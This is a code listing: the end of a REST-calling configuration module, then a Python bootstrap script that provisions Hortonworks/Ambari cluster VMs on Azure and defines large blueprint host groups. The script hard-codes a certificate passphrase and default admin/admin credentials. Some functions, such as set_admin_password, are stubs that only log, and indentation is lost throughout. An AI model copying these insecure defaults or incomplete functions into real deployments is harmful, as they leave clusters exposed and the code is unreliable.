status, result = restCall(auth, 'DELETE', '/v1/configurations/'+str(module.params.get('environment_id')))
if module.params.get('action') == 'read':
if not module.params.get('environment_id'):
module.fail_json(msg="environment_id is required param when action=read")
status, result = restCall(auth, 'GET', '/v1/configurations/'+str(module.params.get('environment_id')))
if module.params.get('action') == 'list':
status, result = restCall(auth, 'GET', '/v2/configurations?scope=me&count=100')
if module.params.get('action') == 'copy':
if not module.params.get('environment_id'):
module.fail_json(msg="environment_id is required param when action=copy")
request_data = {"configuration_id": module.params.get('environment_id')}
if module.params.get('name'):
request_data['name'] = module.params.get('name')
status, result = restCall(auth, 'POST', '/v1/configurations', data=json.dumps(request_data))
if module.params.get('action') == 'wait_ratelimit':
if not module.params.get('environment_id'):
module.fail_json(msg="environment_id is required param when action=wait_ratelimit")
tries = 0
status = -1
while True:
status, result = restCall(auth, 'GET', '/v1/configurations/'+str(module.params.get('environment_id')))
tries = tries + 1
            if (status != 423 and status != 422) or tries > 30:
time.sleep(5)
break
time.sleep(5)
# Check results and exit
if status != requests.codes.ok:
err = "No error message given, likely connection or network failure"
        if result is not None and 'error' in result: err = result['error']
module.fail_json(msg="API call failed, HTTP status: "+str(status)+", error: "+err)
else:
module.exit_json(changed=True, api_result=result, status_code=status)
module.exit_json(changed=False)
if __name__ == '__main__':
main()
| apache-2.0 |
hongbincao/azure-quickstart-templates | hortonworks-on-centos/scripts/vm-bootstrap.py | 89 | 53170 | #
# vm-bootstrap.py
#
# This script is used to prepare VMs launched via HDP Cluster Install Blade on Azure.
#
# Parameters passed from the bootstrap script invocation by the controller (shown in the parameter order).
# Required parameters:
# action: "bootstrap" to set up VM and initiate cluster deployment. "check" for checking on cluster deployment status.
# cluster_id: user-specified name of the cluster
# admin_password: password for the Ambari "admin" user
# Required parameters for "bootstrap" action:
# scenario_id: "evaluation" or "standard"
# num_masters: number of masters in the cluster
# num_workers: number of workers in the cluster
# master_prefix: hostname prefix for master hosts (master hosts are named <cluster_id>-<master_prefix>-<id>
# worker_prefix: hostname prefix for worker hosts (worker hosts are named <cluster_id>-<worker_prefix>-<id>
# domain_name: the domain name part of the hosts, starting with a period (e.g., .cloudapp.net)
# id_padding: number of digits for the host <id> (e.g., 2 uses <id> like 01, 02, .., 10, 11)
# masters_iplist: list of masters' local IPV4 addresses sorted from master_01 to master_XX delimited by a ','
# workers_iplist: list of workers' local IPV4 addresses sorted from worker_01 to worker_XX delimited by a ','
# Required parameters for "check" action:
# --check_timeout_seconds:
# the number of seconds after which the script is required to exit
# --report_timeout_fail:
# if "true", exit code 1 is returned in case deployment has failed, or deployment has not finished after
# check_timeout_seconds
# if "false", exit code 0 is returned if deployment has finished successfully, or deployment has not finished after
# check_timeout_seconds
# Optional:
# protocol: if "https" (default), https:8443 is used for Ambari. Otherwise, Ambari uses http:8080
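# Example invocation (all values below are illustrative placeholders, not values
# taken from this script):
# python vm-bootstrap.py --action bootstrap --cluster_id demo --scenario_id evaluation \
#   --num_masters 2 --num_workers 3 --master_prefix demo-master- --worker_prefix demo-worker- \
#   --domain_name .cloudapp.net --id_padding 2 --masters_iplist 10.0.0.4,10.0.0.5 \
#   --workers_iplist 10.0.0.6,10.0.0.7,10.0.0.8 --admin_password secret --protocol https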
from optparse import OptionParser
import base64
import json
import logging
import os
import pprint
import re
import socket
import sys
import time
import urllib2
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
handler = logging.FileHandler('/tmp/vm-bootstrap.log')
handler.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
handler.setFormatter(formatter)
logger.addHandler(handler)
logger.info('Starting VM Bootstrap...')
parser = OptionParser()
parser.add_option("--cluster_id", type="string", dest="cluster_id")
parser.add_option("--scenario_id", type="string", dest="scenario_id", default="evaluation")
parser.add_option("--num_masters", type="int", dest="num_masters")
parser.add_option("--num_workers", type="int", dest="num_workers")
parser.add_option("--master_prefix", type="string", dest="master_prefix")
parser.add_option("--worker_prefix", type="string", dest="worker_prefix")
parser.add_option("--domain_name", type="string", dest="domain_name")
parser.add_option("--id_padding", type="int", dest="id_padding", default=2)
parser.add_option("--admin_password", type="string", dest="admin_password", default="admin")
parser.add_option("--masters_iplist", type="string", dest="masters_iplist")
parser.add_option("--workers_iplist", type="string", dest="workers_iplist")
parser.add_option("--protocol", type="string", dest="protocol", default="https")
parser.add_option("--action", type="string", dest="action", default="bootstrap")
parser.add_option("--check_timeout_seconds", type="int", dest="check_timeout_seconds", default="250")
parser.add_option("--report_timeout_fail", type="string", dest="report_timeout_fail", default="false")
(options, args) = parser.parse_args()
cluster_id = options.cluster_id
scenario_id = options.scenario_id.lower()
num_masters = options.num_masters
num_workers = options.num_workers
master_prefix = options.master_prefix
worker_prefix = options.worker_prefix
domain_name = options.domain_name
id_padding = options.id_padding
admin_password = options.admin_password
masters_iplist = options.masters_iplist
workers_iplist = options.workers_iplist
protocol = options.protocol
action = options.action
check_timeout_seconds = options.check_timeout_seconds
report_timeout_fail = options.report_timeout_fail.lower() == "true"
logger.info('action=' + action)
admin_username = 'admin'
current_admin_password = 'admin'
request_timeout = 30
port = '8443' if (protocol == 'https') else '8080'
http_handler = urllib2.HTTPHandler(debuglevel=1)
opener = urllib2.build_opener(http_handler)
urllib2.install_opener(opener)
class TimeoutException(Exception):
pass
def get_ambari_auth_string():
return 'Basic ' + base64.encodestring('%s:%s' % (admin_username, current_admin_password)).replace('\n', '')
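# With the default credentials this returns "Basic YWRtaW46YWRtaW4=" (base64 of
# "admin:admin"); the value is sent as the HTTP Basic Authorization header on
# every Ambari REST call below.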
def run_system_command(command):
os.system(command)
def get_hostname(id):
if id <= num_masters:
return master_prefix + str(id).zfill(id_padding)
else:
return worker_prefix + str(id - num_masters).zfill(id_padding)
def get_fqdn(id):
return get_hostname(id) + domain_name
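# For example, with master_prefix "demo-master-", id_padding 2 and domain_name
# ".cloudapp.net" (hypothetical option values), get_fqdn(1) returns
# "demo-master-01.cloudapp.net".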
def get_host_ip(hostname):
if (hostname.startswith(master_prefix)):
return masters_iplist[int(hostname.split('-')[-1]) -1]
else:
return workers_iplist[int(hostname.split('-')[-1]) -1]
def get_host_ip_map(hostnames):
host_ip_map = {}
for hostname in hostnames:
num_tries = 0
ip = None
while ip is None and num_tries < 5:
try:
ip = get_host_ip(hostname)
# ip = socket.gethostbyname(hostname)
except:
time.sleep(1)
num_tries = num_tries + 1
continue
if ip is None:
logger.info('Failed to look up ip address for ' + hostname)
raise
else:
logger.info(hostname + ' resolved to ' + ip)
host_ip_map[hostname] = ip
return host_ip_map
def update_etc_hosts(host_ip_map):
logger.info('Adding entries to /etc/hosts file...')
with open("/etc/hosts", "a") as file:
for host in sorted(host_ip_map):
file.write('%s\t%s\t%s\n' % (host_ip_map[host], host + domain_name, host))
logger.info('Finished updating /etc/hosts')
def update_ambari_agent_ini(ambari_server_hostname):
logger.info('Updating ambari-agent.ini file...')
command = 'sed -i s/hostname=localhost/hostname=%s/ /etc/ambari-agent/conf/ambari-agent.ini' % ambari_server_hostname
logger.info('Executing command: ' + command)
run_system_command(command)
logger.info('Finished updating ambari-agent.ini file')
def patch_ambari_agent():
logger.info('Patching ambari-agent to prevent rpmdb corruption...')
logger.info('Finished patching ambari-agent')
def enable_https():
command = """
printf 'api.ssl=true\nclient.api.ssl.cert_name=https.crt\nclient.api.ssl.key_name=https.key\nclient.api.ssl.port=8443' >> /etc/ambari-server/conf/ambari.properties
mkdir /root/ambari-cert
cd /root/ambari-cert
# create server.crt and server.key (self-signed)
openssl genrsa -out server.key 2048
openssl req -new -key server.key -out server.csr -batch
openssl x509 -req -days 365 -in server.csr -signkey server.key -out server.crt
echo PulUuMWPp0o4Lq6flGA0NGDKNRZQGffW2mWmJI3klSyspS7mUl > pass.txt
cp pass.txt passin.txt
# encrypts server.key with des3 as server.key.secured with the specified password
openssl rsa -in server.key -des3 -out server.key.secured -passout file:pass.txt
# creates /tmp/https.keystore.p12
openssl pkcs12 -export -in 'server.crt' -inkey 'server.key.secured' -certfile 'server.crt' -out '/var/lib/ambari-server/keys/https.keystore.p12' -password file:pass.txt -passin file:passin.txt
mv pass.txt /var/lib/ambari-server/keys/https.pass.txt
cd ..
rm -rf /root/ambari-cert
"""
run_system_command(command)
def set_admin_password(new_password, timeout):
logger.info('Setting admin password...')
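# NOTE: the body above only logs; the real password change has to go through
# Ambari's user API. A hedged sketch of that call (the endpoint and payload shape
# are assumptions about the Ambari v1 REST API, not taken from this script):
#
#   url = '%s://localhost:%s/api/v1/users/%s' % (protocol, port, admin_username)
#   data = json.dumps({'Users/password': new_password,
#                      'Users/old_password': current_admin_password})
#   request = urllib2.Request(url, data)
#   request.add_header('Authorization', get_ambari_auth_string())
#   request.add_header('X-Requested-By', 'ambari')
#   request.get_method = lambda: 'PUT'
#   urllib2.urlopen(request, timeout=request_timeout)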
def poll_until_all_agents_registered(num_hosts, timeout):
url = '%s://localhost:%s/api/v1/hosts' % (protocol, port)
logger.info('Polling until all agents have registered...')
all_hosts_registered = False
start_time = time.time()
while time.time() - start_time < timeout:
request = urllib2.Request(url)
request.add_header("Authorization", get_ambari_auth_string())
try:
result = urllib2.urlopen(request, timeout=request_timeout).read()
pprint.pprint(result)
if (result is not None):
jsonResult = json.loads(result)
if len(jsonResult['items']) >= num_hosts:
all_hosts_registered = True
break
except :
logger.exception('Could not poll agent status from the server.')
time.sleep(5)
if not all_hosts_registered:
raise Exception('Timed out while waiting for all agents to register')
def is_ambari_server_host():
hostname = socket.getfqdn()
hostname = hostname.split('.')[0]
logger.info(hostname)
logger.info('Checking ambari host')
logger.info(ambari_server_hostname)
return hostname == ambari_server_hostname
def create_blueprint(scenario_id):
blueprint_name = 'myblueprint'
logger.info('Creating blueprint for scenario %s' % scenario_id)
url = '%s://localhost:%s/api/v1/blueprints/%s' % (protocol, port, blueprint_name)
evaluation_host_groups = [
{
"name" : "master_1",
"components" : [
{
"name" : "AMBARI_SERVER"
},
{
"name" : "DRPC_SERVER"
},
{
"name" : "HIVE_SERVER"
},
{
"name" : "MYSQL_SERVER"
},
{
"name" : "NIMBUS"
},
{
"name" : "SECONDARY_NAMENODE"
},
{
"name" : "SPARK_JOBHISTORYSERVER"
},
{
"name" : "STORM_UI_SERVER"
},
{
"name" : "FALCON_CLIENT"
},
{
"name" : "HBASE_CLIENT"
},
{
"name" : "HCAT"
},
{
"name" : "HDFS_CLIENT"
},
{
"name" : "HIVE_CLIENT"
},
{
"name" : "MAPREDUCE2_CLIENT"
},
{
"name" : "METRICS_MONITOR"
},
{
"name" : "OOZIE_CLIENT"
},
{
"name" : "PIG"
},
{
"name" : "SLIDER"
},
{
"name" : "SPARK_CLIENT"
},
{
"name" : "SQOOP"
},
{
"name" : "TEZ_CLIENT"
},
{
"name" : "YARN_CLIENT"
},
{
"name" : "ZOOKEEPER_CLIENT"
}
],
"cardinality" : "1"
},
{
"name" : "master_2",
"components" : [
{
"name" : "APP_TIMELINE_SERVER"
},
{
"name" : "FALCON_SERVER"
},
{
"name" : "HBASE_MASTER"
},
{
"name" : "HISTORYSERVER"
},
{
"name" : "HIVE_METASTORE"
},
{
"name" : "KAFKA_BROKER"
},
{
"name" : "METRICS_COLLECTOR"
},
{
"name" : "NAMENODE"
},
{
"name" : "OOZIE_SERVER"
},
{
"name" : "RESOURCEMANAGER"
},
{
"name" : "WEBHCAT_SERVER"
},
{
"name" : "ZOOKEEPER_SERVER"
},
{
"name" : "FALCON_CLIENT"
},
{
"name" : "HBASE_CLIENT"
},
{
"name" : "HCAT"
},
{
"name" : "HDFS_CLIENT"
},
{
"name" : "HIVE_CLIENT"
},
{
"name" : "MAPREDUCE2_CLIENT"
},
{
"name" : "METRICS_MONITOR"
},
{
"name" : "OOZIE_CLIENT"
},
{
"name" : "PIG"
},
{
"name" : "SLIDER"
},
{
"name" : "SPARK_CLIENT"
},
{
"name" : "SQOOP"
},
{
"name" : "TEZ_CLIENT"
},
{
"name" : "YARN_CLIENT"
},
{
"name" : "ZOOKEEPER_CLIENT"
}
],
"cardinality" : "1"
},
{
"name" : "workers",
"components" : [
{
"name" : "DATANODE"
},
{
"name" : "HBASE_REGIONSERVER"
},
{
"name" : "NODEMANAGER"
},
{
"name" : "SUPERVISOR"
},
{
"name" : "FALCON_CLIENT"
},
{
"name" : "HBASE_CLIENT"
},
{
"name" : "HCAT"
},
{
"name" : "HDFS_CLIENT"
},
{
"name" : "HIVE_CLIENT"
},
{
"name" : "MAPREDUCE2_CLIENT"
},
{
"name" : "METRICS_MONITOR"
},
{
"name" : "OOZIE_CLIENT"
},
{
"name" : "PIG"
},
{
"name" : "SLIDER"
},
{
"name" : "SPARK_CLIENT"
},
{
"name" : "SQOOP"
},
{
"name" : "TEZ_CLIENT"
},
{
"name" : "YARN_CLIENT"
},
{
"name" : "ZOOKEEPER_CLIENT"
}
],
"cardinality" : "3"
}
]
small_host_groups = [
{
"name" : "master_1",
"components" : [
{
"name" : "AMBARI_SERVER"
},
{
"name" : "FALCON_CLIENT"
},
{
"name" : "HBASE_CLIENT"
},
{
"name" : "HCAT"
},
{
"name" : "HDFS_CLIENT"
},
{
"name" : "HIVE_CLIENT"
},
{
"name" : "MAPREDUCE2_CLIENT"
},
{
"name" : "METRICS_MONITOR"
},
{
"name" : "OOZIE_CLIENT"
},
{
"name" : "PIG"
},
{
"name" : "SLIDER"
},
{
"name" : "SPARK_CLIENT"
},
{
"name" : "SQOOP"
},
{
"name" : "TEZ_CLIENT"
},
{
"name" : "YARN_CLIENT"
},
{
"name" : "ZOOKEEPER_CLIENT"
}
],
"cardinality" : "1"
},
{
"name" : "master_2",
"components" : [
{
"name" : "METRICS_COLLECTOR"
},
{
"name" : "NAMENODE"
},
{
"name" : "NIMBUS"
},
{
"name" : "ZOOKEEPER_SERVER"
},
{
"name" : "FALCON_CLIENT"
},
{
"name" : "HBASE_CLIENT"
},
{
"name" : "HCAT"
},
{
"name" : "HDFS_CLIENT"
},
{
"name" : "HIVE_CLIENT"
},
{
"name" : "MAPREDUCE2_CLIENT"
},
{
"name" : "METRICS_MONITOR"
},
{
"name" : "OOZIE_CLIENT"
},
{
"name" : "PIG"
},
{
"name" : "SLIDER"
},
{
"name" : "SPARK_CLIENT"
},
{
"name" : "SQOOP"
},
{
"name" : "TEZ_CLIENT"
},
{
"name" : "YARN_CLIENT"
},
{
"name" : "ZOOKEEPER_CLIENT"
}
],
"cardinality" : "1"
},
{
"name" : "master_3",
"components" : [
{
"name" : "DRPC_SERVER"
},
{
"name" : "FALCON_SERVER"
},
{
"name" : "HBASE_MASTER"
},
{
"name" : "HISTORYSERVER"
},
{
"name" : "HIVE_METASTORE"
},
{
"name" : "KAFKA_BROKER"
},
{
"name" : "METRICS_MONITOR"
},
{
"name" : "OOZIE_SERVER"
},
{
"name" : "RESOURCEMANAGER"
},
{
"name" : "SECONDARY_NAMENODE"
},
{
"name" : "WEBHCAT_SERVER"
},
{
"name" : "ZOOKEEPER_SERVER"
},
{
"name" : "FALCON_CLIENT"
},
{
"name" : "HBASE_CLIENT"
},
{
"name" : "HCAT"
},
{
"name" : "HDFS_CLIENT"
},
{
"name" : "HIVE_CLIENT"
},
{
"name" : "MAPREDUCE2_CLIENT"
},
{
"name" : "METRICS_MONITOR"
},
{
"name" : "OOZIE_CLIENT"
},
{
"name" : "PIG"
},
{
"name" : "SLIDER"
},
{
"name" : "SPARK_CLIENT"
},
{
"name" : "SQOOP"
},
{
"name" : "TEZ_CLIENT"
},
{
"name" : "YARN_CLIENT"
},
{
"name" : "ZOOKEEPER_CLIENT"
}
],
"cardinality" : "1"
},
{
"name" : "master_4",
"components" : [
{
"name" : "APP_TIMELINE_SERVER"
},
{
"name" : "HIVE_SERVER"
},
{
"name" : "MYSQL_SERVER"
},
{
"name" : "SPARK_JOBHISTORYSERVER"
},
{
"name" : "STORM_UI_SERVER"
},
{
"name" : "ZOOKEEPER_SERVER"
},
{
"name" : "FALCON_CLIENT"
},
{
"name" : "HBASE_CLIENT"
},
{
"name" : "HCAT"
},
{
"name" : "HDFS_CLIENT"
},
{
"name" : "HIVE_CLIENT"
},
{
"name" : "MAPREDUCE2_CLIENT"
},
{
"name" : "METRICS_MONITOR"
},
{
"name" : "OOZIE_CLIENT"
},
{
"name" : "PIG"
},
{
"name" : "SLIDER"
},
{
"name" : "SPARK_CLIENT"
},
{
"name" : "SQOOP"
},
{
"name" : "TEZ_CLIENT"
},
{
"name" : "YARN_CLIENT"
},
{
"name" : "ZOOKEEPER_CLIENT"
}
],
"cardinality" : "1"
},
{
"name" : "workers",
"components" : [
{
"name" : "DATANODE"
},
{
"name" : "HBASE_REGIONSERVER"
},
{
"name" : "NODEMANAGER"
},
{
"name" : "SUPERVISOR"
},
{
"name" : "FALCON_CLIENT"
},
{
"name" : "HBASE_CLIENT"
},
{
"name" : "HCAT"
},
{
"name" : "HDFS_CLIENT"
},
{
"name" : "HIVE_CLIENT"
},
{
"name" : "MAPREDUCE2_CLIENT"
},
{
"name" : "METRICS_MONITOR"
},
{
"name" : "OOZIE_CLIENT"
},
{
"name" : "PIG"
},
{
"name" : "SLIDER"
},
{
"name" : "SPARK_CLIENT"
},
{
"name" : "SQOOP"
},
{
"name" : "TEZ_CLIENT"
},
{
"name" : "YARN_CLIENT"
},
{
"name" : "ZOOKEEPER_CLIENT"
}
],
"cardinality" : "9"
}
]
medium_host_groups = [
{
"name" : "master_1",
"components" : [
{
"name" : "AMBARI_SERVER"
},
{
"name" : "FALCON_CLIENT"
},
{
"name" : "HBASE_CLIENT"
},
{
"name" : "HCAT"
},
{
"name" : "HDFS_CLIENT"
},
{
"name" : "HIVE_CLIENT"
},
{
"name" : "MAPREDUCE2_CLIENT"
},
{
"name" : "METRICS_MONITOR"
},
{
"name" : "OOZIE_CLIENT"
},
{
"name" : "PIG"
},
{
"name" : "SLIDER"
},
{
"name" : "SPARK_CLIENT"
},
{
"name" : "SQOOP"
},
{
"name" : "TEZ_CLIENT"
},
{
"name" : "YARN_CLIENT"
},
{
"name" : "ZOOKEEPER_CLIENT"
}
],
"cardinality" : "1"
},
{
"name" : "master_2",
"components" : [
{
"name" : "DRPC_SERVER"
},
{
"name" : "METRICS_COLLECTOR"
},
{
"name" : "NAMENODE"
},
{
"name" : "ZOOKEEPER_SERVER"
},
{
"name" : "FALCON_CLIENT"
},
{
"name" : "HBASE_CLIENT"
},
{
"name" : "HCAT"
},
{
"name" : "HDFS_CLIENT"
},
{
"name" : "HIVE_CLIENT"
},
{
"name" : "MAPREDUCE2_CLIENT"
},
{
"name" : "METRICS_MONITOR"
},
{
"name" : "OOZIE_CLIENT"
},
{
"name" : "PIG"
},
{
"name" : "SLIDER"
},
{
"name" : "SPARK_CLIENT"
},
{
"name" : "SQOOP"
},
{
"name" : "TEZ_CLIENT"
},
{
"name" : "YARN_CLIENT"
},
{
"name" : "ZOOKEEPER_CLIENT"
}
],
"cardinality" : "1"
},
{
"name" : "master_3",
"components" : [
{
"name" : "HIVE_SERVER"
},
{
"name" : "SUPERVISOR"
},
{
"name" : "ZOOKEEPER_SERVER"
},
{
"name" : "FALCON_CLIENT"
},
{
"name" : "HBASE_CLIENT"
},
{
"name" : "HCAT"
},
{
"name" : "HDFS_CLIENT"
},
{
"name" : "HIVE_CLIENT"
},
{
"name" : "MAPREDUCE2_CLIENT"
},
{
"name" : "METRICS_MONITOR"
},
{
"name" : "OOZIE_CLIENT"
},
{
"name" : "PIG"
},
{
"name" : "SLIDER"
},
{
"name" : "SPARK_CLIENT"
},
{
"name" : "SQOOP"
},
{
"name" : "TEZ_CLIENT"
},
{
"name" : "YARN_CLIENT"
},
{
"name" : "ZOOKEEPER_CLIENT"
}
],
"cardinality" : "1"
},
{
"name" : "master_4",
"components" : [
{
"name" : "APP_TIMELINE_SERVER"
},
{
"name" : "HIVE_SERVER"
},
{
"name" : "MYSQL_SERVER"
},
{
"name" : "SPARK_JOBHISTORYSERVER"
},
{
"name" : "STORM_UI_SERVER"
},
{
"name" : "ZOOKEEPER_SERVER"
},
{
"name" : "FALCON_CLIENT"
},
{
"name" : "HBASE_CLIENT"
},
{
"name" : "HCAT"
},
{
"name" : "HDFS_CLIENT"
},
{
"name" : "HIVE_CLIENT"
},
{
"name" : "MAPREDUCE2_CLIENT"
},
{
"name" : "METRICS_MONITOR"
},
{
"name" : "OOZIE_CLIENT"
},
{
"name" : "PIG"
},
{
"name" : "SLIDER"
},
{
"name" : "SPARK_CLIENT"
},
{
"name" : "SQOOP"
},
{
"name" : "TEZ_CLIENT"
},
{
"name" : "YARN_CLIENT"
},
{
"name" : "ZOOKEEPER_CLIENT"
}
],
"cardinality" : "1"
},
{
"name" : "workers",
"components" : [
{
"name" : "DATANODE"
},
{
"name" : "HBASE_REGIONSERVER"
},
{
"name" : "NODEMANAGER"
},
{
"name" : "SUPERVISOR"
},
{
"name" : "FALCON_CLIENT"
},
{
"name" : "HBASE_CLIENT"
},
{
"name" : "HCAT"
},
{
"name" : "HDFS_CLIENT"
},
{
"name" : "HIVE_CLIENT"
},
{
"name" : "MAPREDUCE2_CLIENT"
},
{
"name" : "METRICS_MONITOR"
},
{
"name" : "OOZIE_CLIENT"
},
{
"name" : "PIG"
},
{
"name" : "SLIDER"
},
{
"name" : "SPARK_CLIENT"
},
{
"name" : "SQOOP"
},
{
"name" : "TEZ_CLIENT"
},
{
"name" : "YARN_CLIENT"
},
{
"name" : "ZOOKEEPER_CLIENT"
}
],
"cardinality" : "99"
}
]
large_host_groups = [
{
"name" : "master_1",
"components" : [
{
"name" : "AMBARI_SERVER"
},
{
"name" : "KAFKA_BROKER"
},
{
"name" : "METRICS_COLLECTOR"
},
{
"name" : "FALCON_CLIENT"
},
{
"name" : "HBASE_CLIENT"
},
{
"name" : "HCAT"
},
{
"name" : "HDFS_CLIENT"
},
{
"name" : "HIVE_CLIENT"
},
{
"name" : "MAPREDUCE2_CLIENT"
},
{
"name" : "METRICS_MONITOR"
},
{
"name" : "OOZIE_CLIENT"
},
{
"name" : "PIG"
},
{
"name" : "SLIDER"
},
{
"name" : "SPARK_CLIENT"
},
{
"name" : "SQOOP"
},
{
"name" : "TEZ_CLIENT"
},
{
"name" : "YARN_CLIENT"
},
{
"name" : "ZOOKEEPER_CLIENT"
}
],
"cardinality" : "1"
},
{
"name" : "master_2",
"components" : [
{
"name" : "METRICS_COLLECTOR"
},
{
"name" : "NAMENODE"
},
{
"name" : "NIMBUS"
},
{
"name" : "ZOOKEEPER_SERVER"
},
{
"name" : "FALCON_CLIENT"
},
{
"name" : "HBASE_CLIENT"
},
{
"name" : "HCAT"
},
{
"name" : "HDFS_CLIENT"
},
{
"name" : "HIVE_CLIENT"
},
{
"name" : "MAPREDUCE2_CLIENT"
},
{
"name" : "METRICS_MONITOR"
},
{
"name" : "OOZIE_CLIENT"
},
{
"name" : "PIG"
},
{
"name" : "SLIDER"
},
{
"name" : "SPARK_CLIENT"
},
{
"name" : "SQOOP"
},
{
"name" : "TEZ_CLIENT"
},
{
"name" : "YARN_CLIENT"
},
{
"name" : "ZOOKEEPER_CLIENT"
}
],
"cardinality" : "1"
},
{
"name" : "master_3",
"components" : [
{
"name" : "DRPC_SERVER"
},
{
"name" : "FALCON_SERVER"
},
{
"name" : "HBASE_MASTER"
},
{
"name" : "HISTORYSERVER"
},
{
"name" : "HIVE_METASTORE"
},
{
"name" : "KAFKA_BROKER"
},
{
"name" : "OOZIE_SERVER"
},
{
"name" : "RESOURCEMANAGER"
},
{
"name" : "SECONDARY_NAMENODE"
},
{
"name" : "WEBHCAT_SERVER"
},
{
"name" : "ZOOKEEPER_SERVER"
},
{
"name" : "FALCON_CLIENT"
},
{
"name" : "HBASE_CLIENT"
},
{
"name" : "HCAT"
},
{
"name" : "HDFS_CLIENT"
},
{
"name" : "HIVE_CLIENT"
},
{
"name" : "MAPREDUCE2_CLIENT"
},
{
"name" : "METRICS_MONITOR"
},
{
"name" : "OOZIE_CLIENT"
},
{
"name" : "PIG"
},
{
"name" : "SLIDER"
},
{
"name" : "SPARK_CLIENT"
},
{
"name" : "SQOOP"
},
{
"name" : "TEZ_CLIENT"
},
{
"name" : "YARN_CLIENT"
},
{
"name" : "ZOOKEEPER_CLIENT"
}
],
"cardinality" : "1"
},
{
"name" : "master_4",
"components" : [
{
"name" : "HIVE_METASTORE"
},
{
"name" : "MYSQL_SERVER"
},
{
"name" : "SECONDARY_NAMENODE"
},
{
"name" : "SPARK_JOBHISTORYSERVER"
},
{
"name" : "ZOOKEEPER_SERVER"
},
{
"name" : "FALCON_CLIENT"
},
{
"name" : "HBASE_CLIENT"
},
{
"name" : "HCAT"
},
{
"name" : "HDFS_CLIENT"
},
{
"name" : "HIVE_CLIENT"
},
{
"name" : "MAPREDUCE2_CLIENT"
},
{
"name" : "METRICS_MONITOR"
},
{
"name" : "OOZIE_CLIENT"
},
{
"name" : "PIG"
},
{
"name" : "SLIDER"
},
{
"name" : "SPARK_CLIENT"
},
{
"name" : "SQOOP"
},
{
"name" : "TEZ_CLIENT"
},
{
"name" : "YARN_CLIENT"
},
{
"name" : "ZOOKEEPER_CLIENT"
}
],
"cardinality" : "1"
},
{
"name" : "master_5",
"components" : [
{
"name" : "NODEMANAGER"
},
{
"name" : "OOZIE_SERVER"
},
{
"name" : "FALCON_CLIENT"
},
{
"name" : "HBASE_CLIENT"
},
{
"name" : "HCAT"
},
{
"name" : "HDFS_CLIENT"
},
{
"name" : "HIVE_CLIENT"
},
{
"name" : "MAPREDUCE2_CLIENT"
},
{
"name" : "METRICS_MONITOR"
},
{
"name" : "OOZIE_CLIENT"
},
{
"name" : "PIG"
},
{
"name" : "SLIDER"
},
{
"name" : "SPARK_CLIENT"
},
{
"name" : "SQOOP"
},
{
"name" : "TEZ_CLIENT"
},
{
"name" : "YARN_CLIENT"
},
{
"name" : "ZOOKEEPER_CLIENT"
}
],
"cardinality" : "1"
},
{
"name" : "master_6",
"components" : [
{
"name" : "RESOURCEMANAGER"
},
{
"name" : "WEBHCAT_SERVER"
},
{
"name" : "FALCON_CLIENT"
},
{
"name" : "HBASE_CLIENT"
},
{
"name" : "HCAT"
},
{
"name" : "HDFS_CLIENT"
},
{
"name" : "HIVE_CLIENT"
},
{
"name" : "MAPREDUCE2_CLIENT"
},
{
"name" : "METRICS_MONITOR"
},
{
"name" : "OOZIE_CLIENT"
},
{
"name" : "PIG"
},
{
"name" : "SLIDER"
},
{
"name" : "SPARK_CLIENT"
},
{
"name" : "SQOOP"
},
{
"name" : "TEZ_CLIENT"
},
{
"name" : "YARN_CLIENT"
},
{
"name" : "ZOOKEEPER_CLIENT"
}
],
"cardinality" : "1"
},
{
"name" : "master_7",
"components" : [
{
"name" : "HBASE_MASTER"
},
{
"name" : "HISTORYSERVER"
},
{
"name" : "FALCON_CLIENT"
},
{
"name" : "HBASE_CLIENT"
},
{
"name" : "HCAT"
},
{
"name" : "HDFS_CLIENT"
},
{
"name" : "HIVE_CLIENT"
},
{
"name" : "MAPREDUCE2_CLIENT"
},
{
"name" : "METRICS_MONITOR"
},
{
"name" : "OOZIE_CLIENT"
},
{
"name" : "PIG"
},
{
"name" : "SLIDER"
},
{
"name" : "SPARK_CLIENT"
},
{
"name" : "SQOOP"
},
{
"name" : "TEZ_CLIENT"
},
{
"name" : "YARN_CLIENT"
},
{
"name" : "ZOOKEEPER_CLIENT"
}
],
"cardinality" : "1"
},
{
"name" : "master_8",
"components" : [
{
"name" : "APP_TIMELINE_SERVER"
},
{
"name" : "FALCON_SERVER"
},
{
"name" : "NIMBUS"
},
{
"name" : "FALCON_CLIENT"
},
{
"name" : "HBASE_CLIENT"
},
{
"name" : "HCAT"
},
{
"name" : "HDFS_CLIENT"
},
{
"name" : "HIVE_CLIENT"
},
{
"name" : "MAPREDUCE2_CLIENT"
},
{
"name" : "METRICS_MONITOR"
},
{
"name" : "OOZIE_CLIENT"
},
{
"name" : "PIG"
},
{
"name" : "SLIDER"
},
{
"name" : "SPARK_CLIENT"
},
{
"name" : "SQOOP"
},
{
"name" : "TEZ_CLIENT"
},
{
"name" : "YARN_CLIENT"
},
{
"name" : "ZOOKEEPER_CLIENT"
}
],
"cardinality" : "1"
},
{
"name" : "workers",
"components" : [
{
"name" : "DATANODE"
},
{
"name" : "HBASE_REGIONSERVER"
},
{
"name" : "NODEMANAGER"
},
{
"name" : "FALCON_CLIENT"
},
{
"name" : "HBASE_CLIENT"
},
{
"name" : "HCAT"
},
{
"name" : "HDFS_CLIENT"
},
{
"name" : "HIVE_CLIENT"
},
{
"name" : "MAPREDUCE2_CLIENT"
},
{
"name" : "METRICS_MONITOR"
},
{
"name" : "OOZIE_CLIENT"
},
{
"name" : "PIG"
},
{
"name" : "SLIDER"
},
{
"name" : "SPARK_CLIENT"
},
{
"name" : "SQOOP"
},
{
"name" : "TEZ_CLIENT"
},
{
"name" : "YARN_CLIENT"
},
{
"name" : "ZOOKEEPER_CLIENT"
}
],
"cardinality" : "200"
}
]
if scenario_id == 'evaluation':
host_groups = evaluation_host_groups
elif scenario_id == 'small':
host_groups = small_host_groups
elif scenario_id == 'medium':
host_groups = medium_host_groups
elif scenario_id == 'large':
host_groups = large_host_groups
else:
host_groups = evaluation_host_groups
evaluation_configurations = [
{
"ams-hbase-env" : {
"properties" : {
"hbase_master_heapsize" : "512m",
"hbase_regionserver_heapsize" : "512m",
"hbase_regionserver_xmn_max" : "256m",
"hbase_regionserver_xmn_ratio" : "0.2"
}
}
},
{
"capacity-scheduler" : {
"yarn.scheduler.capacity.root.default.maximum-am-resource-percent" : "0.5",
"yarn.scheduler.capacity.maximum-am-resource-percent" : "0.5"
}
},
{
"cluster-env": {
"cluster_name": "sandbox",
"smokeuser": "ambari-qa",
